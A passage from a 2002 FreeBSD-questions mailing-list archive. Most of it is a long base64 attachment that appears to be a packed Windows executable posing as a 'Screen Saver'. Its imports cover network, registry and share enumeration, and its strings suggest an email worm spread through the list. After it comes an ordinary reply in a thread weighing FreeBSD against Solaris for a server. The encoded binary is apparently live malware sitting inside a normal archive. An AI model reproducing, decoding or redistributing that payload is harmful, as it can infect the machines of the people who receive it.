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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 --cxpccee-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 7:31:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp21.singnet.com.sg (smtp21.singnet.com.sg [165.21.101.201]) by hub.freebsd.org (Postfix) with ESMTP id 512B037B400 for ; Sun, 23 Jun 2002 07:31:23 -0700 (PDT) Received: from singapura.singnet.com.sg (singapura.singnet.com.sg [165.21.10.10]) by smtp21.singnet.com.sg (8.12.3/8.12.2) with ESMTP id g5NEVMto030769 for ; Sun, 23 Jun 2002 22:31:22 +0800 Received: (from shanali@localhost) by singapura.singnet.com.sg (8.8.5/8.7.2) id WAA18417 for freebsd-questions@FreeBSD.ORG; Sun, 23 Jun 2002 22:31:22 +0800 (SST) Date: Sun, 23 Jun 2002 22:31:21 +0800 From: S H A N To: Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? Message-ID: <20020623143121.GA17583@singapura.singnet.com.sg> Mail-Followup-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Please don't compare Solaris with FreeBSD. It depends on your situation... as a rough guide: Solaris is good for supercomputing... FreeBSD is just too good for anything other than that e.g. if you are talking about oracle/mysql/web apps FreeBSD rocks but Solaris domain is DB2.. so both have value it really depends on what you want. rgds, On Sun, Jun 23, 2002 at 01:43:48AM -0700, Steve Warwick wrote: > Hi All, > > Sorry for the off topic post but I am interested to get some different > opinions on the "which is better FreeBSD or Solaris?" topic. Everyone I know > is pro Sun so I'm trying to get a balanced view. > > Actually, to clarify my situation: > > Which, in your opinion would make a better server. Sun UltrSparc 5 / 333mhz > running Solaris (I got a great deal on a couple of machines) or a generic > Athlon 1.2mhz running FreeBSD. [both machines have ATA drives & 256meg] > > Your thoughts and expert opinions welcomed, including the peripheral topics > of support, usergroups etc. > > Thanks, > > > Steve > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- S H A N To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 7:39:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from falcon.mail.pas.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74]) by hub.freebsd.org (Postfix) with ESMTP id ADFF837B427 for ; Sun, 23 Jun 2002 07:39:00 -0700 (PDT) Received: from user-119aekg.biz.mindspring.com ([66.149.58.144] helo=ns.flncs.com) by 